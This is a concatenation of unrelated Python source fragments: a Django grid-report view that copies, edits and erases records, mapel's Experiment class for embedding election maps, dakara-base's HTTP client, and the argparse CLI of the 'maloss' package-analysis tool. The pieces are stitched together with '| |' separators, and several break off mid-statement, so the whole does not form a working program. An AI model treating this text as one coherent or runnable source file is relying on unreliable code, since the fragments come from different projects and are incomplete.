_("Can't copy %s") % cls.model._meta.app_label
)
obj.save(using=request.database, force_insert=True)
Comment(
user_id=request.user.pk,
content_type_id=content_type_id,
object_pk=obj.pk,
object_repr=force_str(obj)[:200],
type="add",
comment="Copied from %s." % orig_repr,
).save(using=request.database)
transaction.savepoint_commit(sid)
except cls.model.DoesNotExist:
transaction.savepoint_rollback(sid)
ok = False
resp.write(escape(_("Can't find %s" % key)))
resp.write("<br>")
except Exception as e:
transaction.savepoint_rollback(sid)
ok = False
resp.write(escape(e))
resp.write("<br>")
else:
# Editing records
pk = rec["id"]
sid = transaction.savepoint(using=request.database)
try:
obj = cls.model.objects.using(request.database).get(
pk=rec["id"]
)
del rec["id"]
for i in rec:
if (
rec[i] == "\xa0"
): # Workaround for Jqgrid issue: date field can't be set to blank
rec[i] = None
if hasattr(cls.model, "getModelForm"):
UploadForm = cls.model.getModelForm(
tuple(rec.keys()), database=request.database
)
else:
UploadForm = modelform_factory(
cls.model,
fields=tuple(rec.keys()),
formfield_callback=lambda f: (
isinstance(f, RelatedField)
and f.formfield(using=request.database)
)
or f.formfield(),
)
form = UploadForm(rec, instance=obj)
if form.has_changed():
obj = form.save(commit=False)
obj.save(using=request.database)
Comment(
user_id=request.user.pk,
content_type_id=content_type_id,
object_pk=obj.pk,
object_repr=force_str(obj),
type="change",
comment="Changed %s."
% get_text_list(form.changed_data, "and"),
).save(using=request.database)
transaction.savepoint_commit(sid)
except cls.model.DoesNotExist:
transaction.savepoint_rollback(sid)
ok = False
resp.write(escape(_("Can't find %s" % pk)))
resp.write("<br>")
except (ValidationError, ValueError):
transaction.savepoint_rollback(sid)
ok = False
for error in form.non_field_errors():
resp.write(escape("%s: %s" % (pk, error)))
resp.write("<br>")
for field in form:
for error in field.errors:
resp.write(
escape(
"%s %s: %s: %s"
% (obj.pk, field.name, rec[field.name], error)
)
)
resp.write("<br>")
except Exception as e:
transaction.savepoint_rollback(sid)
ok = False
resp.write(escape(e))
resp.write("<br>")
if ok:
resp.write("OK")
resp.status_code = ok and 200 or 500
return resp
@staticmethod
def dependent_models(m, found):
""" An auxilary method that constructs a set of all dependent models"""
for f in m._meta.get_fields():
if (
f.is_relation
and f.auto_created
and f.related_model != m
and f.related_model not in found
):
for sub in f.related_model.__subclasses__():
# if sub not in found:
found.update([sub])
found.update([f.related_model])
GridReport.dependent_models(f.related_model, found)
@staticmethod
def sort_models(models):
# Inject additional dependencies that are not reflected in database constraints
for m in models:
for e in getattr(m[1], "extra_dependencies", []):
for m2 in models:
if m2[1] == e:
m2[3].update([m[1]])
# Sort the list of models, based on dependencies between models
models.sort(key=lambda m: (m[1].__name__, m[0].upper()))
cnt = len(models)
ok = False
while not ok:
ok = True
for i in range(cnt):
j = i + 1
while j < cnt and ok:
if models[i][1] != models[j][1] and models[i][1] in models[j][3]:
i_base = models[i][1].__base__
if i_base == Model or i_base._meta.abstract:
i_base = None
j_base = models[j][1].__base__
if j_base == Model or j_base._meta.abstract:
j_base = None
if i_base == j_base and i_base and j_base:
j += 1
continue
if i_base == models[j][1] or j_base == models[i][1]:
j += 1
continue
models.append(models.pop(i))
while j < cnt:
if models[i][1] == models[j][1]:
models.append(models.pop(j))
j += 1
ok = False
break
elif (
models[i][1] == models[j][1]
and models[i][0].upper() > models[j][0].upper()
):
models[i], models[j] = models[j], models[i]
ok = False
j += 1
return models
@classmethod
def erase(cls, request):
# Build a list of dependencies
deps = set([cls.model])
# Special case for MO/PO/DO/DLVR that cannot be truncated
if cls.model.__name__ not in (
"PurchaseOrder",
"ManufacturingOrder",
"DistributionOrder",
"DeliveryOrder",
):
GridReport.dependent_models(cls.model, deps)
# Check the delete permissions for all related objects
for m in deps:
permname = get_permission_codename("delete", m._meta)
if not request.user.has_perm("%s.%s" % (m._meta.app_label, permname)):
return format_lazy(
"{}:{}", m._meta.verbose_name, _("Permission denied")
)
# Delete the data records
cursor = connections[request.database].cursor()
with transaction.atomic(using=request.database):
sql_list = []
containsOperationPlan = any(m.__name__ == "OperationPlan" for m in deps)
for m in deps:
if "getDeleteStatements" in dir(m) and not containsOperationPlan:
sql_list.extend(m.getDeleteStatements())
else:
sql_list = connections[request.database].ops.sql_flush(
no_style(), [m._meta.db_table for m in deps], []
)
for sql in sql_list:
cursor.execute(sql)
# Erase comments and history
content_ids = | |
<filename>mapel/main/objects/Experiment.py
#!/usr/bin/env python
import csv
import itertools
import logging
import math
import os
import warnings
from abc import ABCMeta, abstractmethod
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
from scipy.stats import stats
from mapel.main.embedding.kamada_kawai.kamada_kawai import KamadaKawai
COLORS = []
from PIL import Image
from mapel.main.objects.Family import Family
import mapel.elections.print_ as pr
try:
from sklearn.manifold import MDS
from sklearn.manifold import TSNE
from sklearn.manifold import SpectralEmbedding
from sklearn.manifold import LocallyLinearEmbedding
from sklearn.manifold import Isomap
except ImportError as error:
MDS = None
TSNE = None
SpectralEmbedding = None
LocallyLinearEmbedding = None
Isomap = None
print(error)
class Experiment:
__metaclass__ = ABCMeta
"""Abstract set of instances."""
def __init__(self, instances=None, distances=None, dim=2, store=True,
coordinates=None, distance_id='emd-positionwise', experiment_id=None,
instance_type='ordinal', _import=True, clean=False, coordinates_names=None,
embedding_id='kamada', fast_import=False):
self._import = _import
self.clean = clean
self.experiment_id = experiment_id
self.fast_import = fast_import
if clean:
self.clean_elections()
self.distance_id = distance_id
self.embedding_id = embedding_id
self.instances = None
self.distances = None
self.coordinates = None
self.coordinates_lists = {}
self.families = {}
self.times = {}
self.stds = {}
self.matchings = {}
self.features = {}
self.coordinates_by_families = {}
self.num_families = None
self.num_instances = None
self.main_order = None
self.instance_type = instance_type
if experiment_id is None:
self.experiment_id = 'virtual'
self.store = False
else:
self.store = True
self.experiment_id = experiment_id
self.create_structure()
self.families = self.import_controllers()
self.store = store
if isinstance(instances, dict):
self.instances = instances
print('=== Omitting import! ===')
elif _import and self.experiment_id != 'virtual':
try:
self.instances = self.add_instances_to_experiment()
self.num_instances = len(self.instances)
print('=== Elections imported successfully! ===')
except FileNotFoundError:
print('=== Elections not found! ===')
self.instances = {}
else:
self.instances = {}
if isinstance(distances, dict):
self.distances = distances
print('=== Omitting import! ===')
elif _import and self.experiment_id != 'virtual':
try:
self.distances, self.times, self.stds = self.add_distances_to_experiment()
print('=== Distances imported successfully! ===')
except FileNotFoundError:
print('=== Distances not found! ===')
else:
self.distances = {}
if isinstance(coordinates, dict):
self.coordinates = coordinates
print('=== Omitting import! ===')
elif _import and self.experiment_id != 'virtual':
try:
if coordinates_names is not None:
for file_name in coordinates_names:
self.coordinates_lists[file_name] = \
self.add_coordinates_to_experiment(dim=dim, file_name=file_name)
self.coordinates = self.coordinates_lists[coordinates_names[0]]
else:
self.coordinates = self.add_coordinates_to_experiment(dim=dim)
print('=== Coordinates imported successfully! ===')
except FileNotFoundError:
print('=== Coordinates not found! ===')
else:
self.coordinates = {}
for family_id in self.families:
for instance_id in self.families[family_id].instance_ids:
self.instances[instance_id].label = self.families[family_id].label
@abstractmethod
def prepare_instances(self):
pass
@abstractmethod
def add_instance(self):
pass
@abstractmethod
def add_family(self):
pass
def embed(self, algorithm: str = 'spring', num_iterations: int = 1000, radius: float = np.infty,
dim: int = 2, num_neighbors: int = None, method: str = 'standard',
zero_distance: float = 0.1, factor: float = 1., saveas: str = None,
init_pos: dict = None, fixed=True) -> None:
attraction_factor = 1
if algorithm == 'spring':
attraction_factor = 2
num_elections = len(self.distances)
x = np.zeros((num_elections, num_elections))
initial_positions = None
if init_pos is not None:
initial_positions = {}
for i, instance_id_1 in enumerate(self.distances):
if instance_id_1 in init_pos:
initial_positions[i] = init_pos[instance_id_1]
for i, instance_id_1 in enumerate(self.distances):
for j, instance_id_2 in enumerate(self.distances):
if i < j:
self.distances[instance_id_1][instance_id_2] *= factor
if self.distances[instance_id_1][instance_id_2] == 0.:
self.distances[instance_id_1][instance_id_2] = zero_distance
self.distances[instance_id_2][instance_id_1] = zero_distance
if algorithm in {'spring'}:
normal = True
if self.distances[instance_id_1][instance_id_2] > radius:
x[i][j] = 0.
normal = False
if num_neighbors is not None:
tmp = self.distances[instance_id_1]
sorted_list_1 = list((dict(sorted(tmp.items(),
key=lambda item: item[1]))).keys())
tmp = self.distances[instance_id_2]
sorted_list_2 = list((dict(sorted(tmp.items(),
key=lambda item: item[1]))).keys())
if (instance_id_1 not in sorted_list_2[0:num_neighbors]) and (
instance_id_2 not in sorted_list_1[0:num_neighbors]):
x[i][j] = 0.
normal = False
if normal:
x[i][j] = 1. / self.distances[instance_id_1][
instance_id_2]
else:
x[i][j] = self.distances[instance_id_1][instance_id_2]
x[i][j] = x[i][j] ** attraction_factor
x[j][i] = x[i][j]
dt = [('weight', float)]
y = x.view(dt)
graph = nx.from_numpy_array(y)
if num_neighbors is None:
num_neighbors = 100
if algorithm.lower() == 'spring':
my_pos = nx.spring_layout(graph, iterations=num_iterations, dim=dim)
elif algorithm.lower() in {'mds'}:
my_pos = MDS(n_components=dim, dissimilarity='precomputed').fit_transform(x)
elif algorithm.lower() in {'tsne'}:
my_pos = TSNE(n_components=dim).fit_transform(x)
elif algorithm.lower() in {'se'}:
my_pos = SpectralEmbedding(n_components=dim).fit_transform(x)
elif algorithm.lower() in {'isomap'}:
my_pos = Isomap(n_components=dim, n_neighbors=num_neighbors).fit_transform(x)
elif algorithm.lower() in {'lle'}:
my_pos = LocallyLinearEmbedding(n_components=dim,
n_neighbors=num_neighbors,
max_iter=num_iterations,
method=method).fit_transform(x)
elif algorithm.lower() in {'kamada-kawai', 'kamada', 'kawai'}:
my_pos = KamadaKawai().embed(
distances=x, initial_positions=initial_positions,
fix_initial_positions=fixed
)
elif algorithm.lower() in {'geo'}:
f1 = self.import_feature('voterlikeness_sqrt')
f2 = self.import_feature('borda_diversity')
for f in f1:
if f1[f] is None:
f1[f] = 0
if f2[f] is None:
f2[f] = 0
my_pos = [[f1[e], f2[e]] for e in f1]
else:
my_pos = []
logging.warning("Unknown method!")
self.coordinates = {}
for i, instance_id in enumerate(self.distances):
self.coordinates[instance_id] = [my_pos[i][d] for d in range(dim)]
pr.adjust_the_map(self)
if self.store:
if saveas is None:
file_name = f'{algorithm}_{self.distance_id}_{str(dim)}d.csv'
else:
file_name = f'{saveas}.csv'
path = os.path.join(os.getcwd(), "experiments", self.experiment_id,
"coordinates", file_name)
with open(path, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=';')
if dim == 2:
writer.writerow(["instance_id", "x", "y"])
print(["instance_id", "x", "y"])
elif dim == 3:
writer.writerow(["instance_id", "x", "y", "z"])
ctr = 0
for instance_id in self.instances:
x = round(self.coordinates[instance_id][0], 5)
y = round(self.coordinates[instance_id][1], 5)
if dim == 2:
writer.writerow([instance_id, x, y])
elif dim == 3:
z = round(my_pos[ctr][2], 5)
writer.writerow([instance_id, x, y, z])
ctr += 1
# self.coordinates = coordinates
def print_map(self, dim: int = 2, **kwargs) -> None:
""" Print the two-dimensional embedding of multi-dimensional map of the instances """
if dim == 2:
pr.print_map_2d(self, **kwargs)
elif dim == 3:
pr.print_map_3d(self, **kwargs)
def print_matrix(self, **kwargs):
pr.print_matrix(experiment=self, **kwargs)
@abstractmethod
def add_instances_to_experiment(self):
pass
@abstractmethod
def add_folders_to_experiment(self):
pass
@abstractmethod
def create_structure(self):
pass
@abstractmethod
def import_controllers(self):
pass
def add_coordinates_to_experiment(self, dim=2, file_name=None) -> dict:
""" Import from a file precomputed coordinates of all the points --
each point refer to one instance """
coordinates = {}
if file_name is None:
file_name = f'{self.embedding_id}_{self.distance_id}_{dim}d.csv'
path = os.path.join(os.getcwd(), "experiments", self.experiment_id,
"coordinates", file_name)
print(path)
with open(path, 'r', newline='') as csv_file:
# ORIGINAL
reader = csv.DictReader(csv_file, delimiter=';')
warn = False
for row in reader:
try:
instance_id = row['instance_id']
except:
try:
instance_id = row['election_id']
except:
pass
if dim == 2:
coordinates[instance_id] = [float(row['x']), float(row['y'])]
elif dim == 3:
coordinates[instance_id] = [float(row['x']), float(row['y']), float(row['z'])]
if instance_id not in self.instances:
warn = True
# if warn:
# text = f'Possibly outdated coordinates are imported!'
# warnings.warn(text, stacklevel=2)
if warn:
text = f'Possibly outdated coordinates are imported!'
logging.warning(text)
# warnings.warn(text)
return coordinates
def compute_coordinates_by_families(self) -> None:
""" Group all points by their families """
coordinates_by_families = {}
if self.families is None:
self.families = {}
for i, instance_id in enumerate(self.instances):
ele = self.instances[instance_id]
model = ele.model_id
family_id = model
label = instance_id
color = COLORS[int(i % len(COLORS))]
alpha = 1.
self.families[instance_id] = Family(
model_id=model, family_id=family_id,
label=label, alpha=alpha,
color=color)
for family_id in self.families:
coordinates_by_families[family_id] = [[] for _ in range(3)]
coordinates_by_families[family_id][0].append(self.coordinates[family_id][0])
coordinates_by_families[family_id][1].append(self.coordinates[family_id][1])
try:
coordinates_by_families[family_id][2].append(self.coordinates[family_id][2])
except Exception:
pass
else:
for family_id in self.families:
coordinates_by_families[family_id] = [[] for _ in range(3)]
try:
for instance_id in self.families[family_id].instance_ids:
coordinates_by_families[family_id][0].append(
self.coordinates[instance_id][0])
coordinates_by_families[family_id][1].append(
self.coordinates[instance_id][1])
try:
coordinates_by_families[family_id][2].append(
self.coordinates[instance_id][2])
except Exception:
pass
except:
for instance_id in self.families[family_id].instance_ids:
coordinates_by_families[family_id][0].append(
self.coordinates[instance_id][0])
coordinates_by_families[family_id][1].append(
self.coordinates[instance_id][1])
try:
coordinates_by_families[family_id][2].append(
self.coordinates[instance_id][2])
except Exception:
pass
self.coordinates_by_families = coordinates_by_families
def get_distance(self, i, j):
""" Compute Euclidean distance in two-dimensional space"""
distance = 0.
for d in range(2):
distance += (self.coordinates[i][d] - self.coordinates[j][d]) ** 2
return math.sqrt(distance)
def rotate(self, angle) -> None:
""" Rotate all the points by a given angle """
for instance_id in self.instances:
self.coordinates[instance_id][0], self.coordinates[instance_id][1] = \
self.rotate_point(0.5, 0.5, angle, self.coordinates[instance_id][0],
self.coordinates[instance_id][1])
self.compute_coordinates_by_families()
def reverse(self) -> None:
""" Reverse all the points"""
for instance_id in self.instances:
self.coordinates[instance_id][0] = self.coordinates[instance_id][0]
self.coordinates[instance_id][1] = -self.coordinates[instance_id][1]
self.compute_coordinates_by_families()
def update(self) -> None:
""" Save current coordinates of all the points to the original file"""
path = os.path.join(os.getcwd(), "experiments", self.experiment_id,
"coordinates", f'{self.distance_id}_2d.csv')
with open(path, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=';')
writer.writerow(["instance_id", "x", "y"])
for election_id in self.instances:
x = round(self.coordinates[election_id][0], 5)
y = round(self.coordinates[election_id][1], 5)
writer.writerow([election_id, x, y])
@staticmethod
def rotate_point(cx, cy, angle, px, py) -> (float, float):
""" Rotate two-dimensional point by an angle """
s, c = math.sin(angle), math.cos(angle)
px -= cx
py -= cy
x_new, y_new = px * c - py * s, px * s + py * c
px, py = x_new + cx, y_new + cy
return px, py
def add_distances_to_experiment(self) -> (dict, dict, dict):
""" Import precomputed distances between each pair of instances from a file """
file_name = f'{self.distance_id}.csv'
path = os.path.join(os.getcwd(), 'experiments', self.experiment_id, 'distances', file_name)
distances = {}
times = {}
stds = {}
| |
<reponame>DakaraProject/dakara-base
"""HTTP client helper module.
This module provides the HTTP client class `HTTPClient`, built on the requests
library. The class is designed to be used with an API which communicates with
JSON messages. It is pretty straightforward to use:
>>> config = {
... "url": "http://www.example.com",
... "login": "login here",
... "password": "<PASSWORD>",
... }
>>> client = HTTPClient(config, endpoint_prefix="api/")
>>> client.authenticate()
>>> data = client.get("library/songs/")
>>> client.post("library/songs", json={"title": "some title"})
"""
import logging
import requests
from furl import furl
from dakara_base.exceptions import DakaraError
from dakara_base.utils import create_url, truncate_message
logger = logging.getLogger(__name__)
def authenticated(fun):
"""Decorator that ensures the token is set.
It makes sure that the given function is called only if authenticated. If
not authenticated, calling the function will raise a `NotAuthenticatedError`.
Args:
fun (function): Function to decorate.
Returns:
function: Decorated function.
"""
def call(self, *args, **kwargs):
if self.token is None:
raise NotAuthenticatedError("No connection established")
return fun(self, *args, **kwargs)
return call
class HTTPClient:
"""HTTP client designed to work with an API.
The API must use JSON for message content.
The client uses a token credential policy only and authenticates with a
traditional login/password mechanism.
Attributes:
AUTHENTICATE_ENDPOINT (str): Endpoint for authentication.
mute_raise (bool): If true, no exception will be raised when performing
connections with the server (but authentication), only logged.
server_url (str): URL of the server.
token (str): Value of the token. The token is set when successfuly
calling `authenticate`.
login (str): Login used for authentication.
password (str): Password used for authentication.
Args:
config (dict): Config of the server.
endpoint_prefix (str): Prefix of the endpoint, added to the URL.
mute_raise (bool): If true, no exception will be raised when performing
connections with the server (but authentication), only logged.
Raises:
ParameterError: If critical parameters cannot be found in the
configuration.
"""
AUTHENTICATE_ENDPOINT = "accounts/login/"
def __init__(self, config, endpoint_prefix="", mute_raise=False):
self.mute_raise = mute_raise
try:
# url
self.server_url = create_url(**config, path=endpoint_prefix)
# authentication
self.token = None
self.login = config["login"]
self.password = config["password"]
except KeyError as error:
raise ParameterError(
"Missing parameter in server config: {}".format(error)
) from error
def send_request_raw(
self,
method,
endpoint,
*args,
message_on_error="",
function_on_error=None,
**kwargs
):
"""Generic method to send requests to the server.
It takes care of errors and raises exceptions.
Args:
method (str): Name of the HTTP method to use.
endpoint (str): Endpoint to send the request to. Will be added to
the end of the server URL.
message_on_error (str): Message to display in logs in case of
error. It should describe what the request was about.
function_on_error (function): Fuction called if the request is not
successful, it will receive the response and must return an
exception that will be raised. If not provided, a basic error
management is done.
Extra arguments are passed to requests' get/post/put/patch/delete
methods.
Returns:
requests.models.Response: Response object.
Raises:
MethodError: If the method is not supported.
ResponseRequestError: For any error when communicating with the server.
ResponseInvalidError: If the response has an error code different
to 2**.
"""
# handle method function
if not hasattr(requests, method):
raise MethodError("Method {} not supported".format(method))
send_method = getattr(requests, method)
# handle message on error
if not message_on_error:
message_on_error = "Unable to request the server"
# forge URL
url = furl(self.server_url).add(path=endpoint).url
logger.debug("Sending %s request to %s", method.upper(), url)
try:
# send request to the server
response = send_method(url, *args, **kwargs)
except requests.exceptions.RequestException as error:
# handle connection error
logger.error("%s, communication error", message_on_error)
raise ResponseRequestError(
"Error when communicating with the server: {}".format(error)
) from error
# return here if the request was made without error
if response.ok:
return response
# otherwise call custom error management function
if function_on_error:
raise function_on_error(response)
# otherwise manage error generically
logger.error(message_on_error)
logger.debug(
"Error %i: %s", response.status_code, truncate_message(response.text)
)
raise ResponseInvalidError(
"Error {} when communicationg with the server: {}".format(
response.status_code, response.text
)
)
@authenticated
def send_request(self, *args, **kwargs):
"""Generic method to send requests to the server when connected.
It adds token header for authentication and takes care of errors.
If `mute_raise` is set, no exceptions are raised in case of error when
communicating with the server.
Args:
See `send_request_raw`.
Returns:
requests.models.Response: Response object. None if an error occurs
when communicating with the server and `mute_raise` is set.
Raises:
MethodError: If the method is not supported.
ResponseRequestError: For any error when communicating with the server.
ResponseInvalidError: If the response has an error code different
to 2**.
"""
try:
# make the request
return self.send_request_raw(
*args, headers=self.get_token_header(), **kwargs
)
# manage request error
except ResponseError:
if self.mute_raise:
return None
raise
def get(self, *args, **kwargs):
"""Generic method to get data on server.
Args:
endpoint (str): Endpoint to send the request to. Will be added to
the end of the server URL.
message_on_error (str): Message to display in logs in case of
error. It should describe what the request was about.
function_on_error (function): Fuction called if the request is not
successful, it will receive the response and must return an
exception that will be raised. If not provided, a basic error
management is done.
Extra arguments are passed to requests' get method.
Returns:
dict: Response object from the server.
Raises:
ResponseRequestError: For any error when communicating with the server.
ResponseInvalidError: If the response has an error code different
to 2**.
"""
return self.get_json_from_response(self.send_request("get", *args, **kwargs))
def post(self, *args, **kwargs):
"""Generic method to post data on server.
Args:
endpoint (str): Endpoint to send the request to. Will be added to
the end of the server URL.
message_on_error (str): Message to display in logs in case of
error. It should describe what the request was about.
function_on_error (function): Fuction called if the request is not
successful, it will receive the response and must return an
exception that will be raised. If not provided, a basic error
management is done.
Extra arguments are passed to requests' post method.
Returns:
dict: Response object from the server.
Raises:
ResponseRequestError: For any error when communicating with the server.
ResponseInvalidError: If the response has an error code different
to 2**.
"""
return self.get_json_from_response(self.send_request("post", *args, **kwargs))
def put(self, *args, **kwargs):
"""Generic method to put data on server.
Args:
endpoint (str): Endpoint to send the request to. Will be added to
the end of the server URL.
message_on_error (str): Message to display in logs in case of
error. It should describe what the request was about.
function_on_error (function): Fuction called if the request is not
successful, it will receive the response and must return an
exception that will be raised. If not provided, a basic error
management is done.
Extra arguments are passed to requests' put method.
Returns:
dict: Response object from the server.
Raises:
ResponseRequestError: For any error when communicating with the server.
ResponseInvalidError: If the response has an error code different
to 2**.
"""
return self.get_json_from_response(self.send_request("put", *args, **kwargs))
def patch(self, *args, **kwargs):
"""Generic method to patch data on server.
Args:
endpoint (str): Endpoint to send the request to. Will be added to
the end of the server URL.
message_on_error (str): Message to display in logs in case of
error. It should describe what the request was about.
function_on_error (function): Fuction called if the request is not
successful, it will receive the response and must return an
exception that will be raised. If not provided, a basic error
management is done.
Extra arguments are passed to requests' patch method.
Returns:
dict: Response object from the server.
Raises:
ResponseRequestError: For any error when communicating with the server.
ResponseInvalidError: If the response has an error code different
to 2**.
"""
return self.get_json_from_response(self.send_request("patch", *args, **kwargs))
def delete(self, *args, **kwargs):
"""Generic method to patch data on server.
Args:
endpoint (str): Endpoint to send the request to. Will be added to
the end of the server URL.
message_on_error (str): Message to display in logs in case of
error. It should describe what the request was about.
function_on_error (function): Fuction called if the request is not
successful, it will receive the response and must return an
exception that will be raised. If not provided, a basic error
management is | |
import argparse
import sys
from util.enum_util import PackageManagerEnum, LanguageEnum, DistanceAlgorithmEnum, TraceTypeEnum, DataTypeEnum
def parse_args(argv):
parser = argparse.ArgumentParser(prog="maloss", description="Parse arguments")
subparsers = parser.add_subparsers(help='Command (e.g. crawl )', dest='cmd')
# select pm
parser_select_pm = subparsers.add_parser("select_pm", help="Select the package manager satisfying criteria!")
parser_select_pm.add_argument("-t", "--threshold", default=100000, type=int,
help="Threshold for number of packages to pick package managers")
# select packages
parser_select_pkg = subparsers.add_parser("select_pkg", help="Select packages based on popularity!")
parser_select_pkg.add_argument("infile", help="Path to the input file.")
parser_select_pkg.add_argument("outfile", help="Path to the output file.")
parser_select_pkg.add_argument("-f", "--field", dest="field",
help="The field to rank/filter on packages. Can be overall or last_month or use_count. "
"default is overall and then last_month.")
select_pkg_criteria = parser_select_pkg.add_mutually_exclusive_group(required=True)
select_pkg_criteria.add_argument("-n", "--top_n_pkgs", default=0, type=int,
help="Pick the top n packages ranked by total downloads")
select_pkg_criteria.add_argument("-t", "--threshold", default=0, type=int,
help="Threshold for total number of downloads to pick packages")
# crawl
parser_crawl = subparsers.add_parser("crawl", help="Crawl the source sites for different package managers!")
parser_crawl.add_argument("package_manager", default=PackageManagerEnum.pypi, type=PackageManagerEnum,
choices=list(PackageManagerEnum), help="Name of the package manager to crawl")
parser_crawl.add_argument("-i", "--infile", dest="infile", help="Path to the input file.")
parser_crawl.add_argument("-s", "--stats", dest="stats", action="store_true", help="Crawl statistics.")
parser_crawl.add_argument("-p", "--processes", dest="processes", default=1, type=int,
help="Number of processes to use if stats is enabled")
parser_crawl.add_argument("outfile", help="Path to the output file, format is csv.")
# edit distance
parser_edit_dist = subparsers.add_parser("edit_dist", help="Compute the edit distance for packages!")
parser_edit_dist.add_argument("source", help="Path to the list of packages as source in comparison")
parser_edit_dist.add_argument("-t", "--target", dest="target",
help="Optional path to list of packages as target in comparison. If not specified, use source as target.")
parser_edit_dist.add_argument("outfile", help="Path to the output file, format is csv.")
parser_edit_dist.add_argument("--pair_outfile", help="Path to the optional pair output file, format is csv.")
parser_edit_dist.add_argument("-a", "--algorithm", dest="algorithm", default=DistanceAlgorithmEnum.py_edit_distance,
type=DistanceAlgorithmEnum, choices=list(DistanceAlgorithmEnum), help="Distance algorithm to use")
parser_edit_dist.add_argument("-b", "--batch_size", dest="batch_size", default=10000, type=int,
help="Batch size of packages in comparison. Split large list to avoid out of memory.")
parser_edit_dist.add_argument("--threshold", dest="threshold", default=2, type=int,
help="The threshold of edit distance to filter comparison results.")
parser_edit_dist.add_argument("-p", "--processes", dest="processes", default=1, type=int,
help="Number of processes to use")
# get versions
parser_get_versions = subparsers.add_parser("get_versions", help="Get versions for the packages!")
parser_get_versions.add_argument("infile", help="Path to the input file of packages.")
parser_get_versions.add_argument("outfile", help="Path to the output file.")
parser_get_versions.add_argument("-c", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_get_versions.add_argument("--max_num", dest="max_num", type=int, help="Maximum number of versions to consider")
parser_get_versions.add_argument("--min_gap_days", dest="min_gap_days", type=int,
help="If max_num is specified (>=), the minimum gap days for filtering versions")
parser_get_versions.add_argument("--with_time", dest="with_time", action="store_true", help="Fetch timestamp as well")
parser_get_versions.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
# get author
parser_get_author = subparsers.add_parser("get_author", help="Get author for the packages!")
parser_get_author.add_argument("infile", help="Path to the input file of packages.")
parser_get_author.add_argument("outfile", help="Path to the output file.")
parser_get_author.add_argument("-c", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_get_author.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
# get stats
parser_get_stats = subparsers.add_parser("get_stats", help="Get stats for the packages!")
parser_get_stats.add_argument("infile", help="Path to the input file of packages.")
parser_get_stats.add_argument("outfile", help="Path to the output file.")
parser_get_stats.add_argument("-m", "--package_manager", type=PackageManagerEnum, choices=list(PackageManagerEnum),
help="Package manager of the specified input.")
# get package metadata and versions
parser_get_metadata = subparsers.add_parser("get_metadata", help="Get metadata and versions for the specified package!")
parser_get_metadata.add_argument("-n", "--package_name", required=True, dest="package_name", help="Package name.")
parser_get_metadata.add_argument("-c", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_get_metadata.add_argument("-i", "--isolate_pkg_info", action="store_true",
help="Isolate package info into different directories!")
parser_get_metadata.add_argument("-v", "--package_version", dest="package_version", help="Package version")
parser_get_metadata.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
# get package dependency
parser_get_dep = subparsers.add_parser("get_dep", help="Get dependency for the specified package!")
parser_get_dep.add_argument("-n", "--package_name", required=True, dest="package_name", help="Package name.")
parser_get_dep.add_argument("-c", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_get_dep.add_argument("-i", "--isolate_pkg_info", action="store_true",
help="Isolate package info into different directories!")
parser_get_dep.add_argument("-v", "--package_version", dest="package_version", help="Package version")
parser_get_dep.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
# build package dependency tree for airflow DAG execution
parser_build_dep = subparsers.add_parser("build_dep", help="Build the dependency graph!")
parser_build_dep.add_argument("infile", help="Path to the input file of packages.")
parser_build_dep.add_argument("outfile", help="Path to the output file.")
parser_build_dep.add_argument("-c", "--cache_dir", dest="cache_dir", required=True,
help="Path to the cache dir for metadata/dep.")
parser_build_dep.add_argument("-v", "--record_version", dest="record_version", action="store_true",
help="Record versions in the dep graph. Default is to consider the latest version.")
parser_build_dep.add_argument("-l", "--language", dest="language", default=LanguageEnum.python, type=LanguageEnum,
choices=list(LanguageEnum), help="Language of the specified input.")
# build author package graph
parser_build_author = subparsers.add_parser("build_author", help="Build the author-package graph!")
parser_build_author.add_argument("outfile", help="Path to the output file.")
parser_build_author.add_argument("-i", "--infiles", dest="infiles", nargs='+', help="List of input files.")
parser_build_author.add_argument("-t", "--top_authors", dest="top_authors",
help="Path to the top authors output file.")
parser_build_author.add_argument("-l", "--languages", dest="languages", nargs='+', type=LanguageEnum,
choices=list(LanguageEnum), help="Language of the specified input.")
# split package dependency tree into n copies
parser_split_graph = subparsers.add_parser("split_graph", help="Split a graph into n copies!")
parser_split_graph.add_argument("infile", help="Path to the input file of packages.")
parser_split_graph.add_argument("out_dir", help="Path to the output directory.")
parser_split_graph.add_argument("-k", "--k_out_dirs", type=int, help="Number of out_dirs to store splitted files")
split_graph_algo = parser_split_graph.add_mutually_exclusive_group(required=True)
split_graph_algo.add_argument("-n", "--num_outputs", type=int,
help="Number of outputs to split the input file into!")
split_graph_algo.add_argument("-s", "--seedfile", help="List of seed packages that must be in subgraph.")
parser_split_graph.add_argument("-d", "--dagfile", dest="dagfile", help="Path to the dag file for infile.")
# install specified package
parser_install = subparsers.add_parser("install", help="Install the specified package!")
parser_install.add_argument("-n", "--package_name", required=True, dest="package_name", help="Package name.")
parser_install.add_argument("-i", "--install_dir", dest="install_dir", help="path to the install dir.")
parser_install.add_argument("-c", "--cache_dir", dest="cache_dir", help="Path to the cache dir for metadata/dep.")
parser_install.add_argument("-o", "--out_dir", dest="out_dir", help="Path to the tracing output.")
parser_install.add_argument("-t", "--trace", dest="trace", action="store_true", help="Trace the program.")
parser_install.add_argument("--trace_string_size", dest="trace_string_size", type=int, help="String size in trace")
parser_install.add_argument("-s", "--sudo", dest="sudo", action="store_true", help="Run with sudo privilege.")
parser_install.add_argument("-v", "--package_version", dest="package_version", help="Package version")
parser_install.add_argument("-l", "--language", dest="language", default=LanguageEnum.python,
type=LanguageEnum, choices=list(LanguageEnum), help="Language of the specified input.")
# parse source file and generate ast
parser_astgen = subparsers.add_parser("astgen", help="Generate Abstract Syntax Tree from source files")
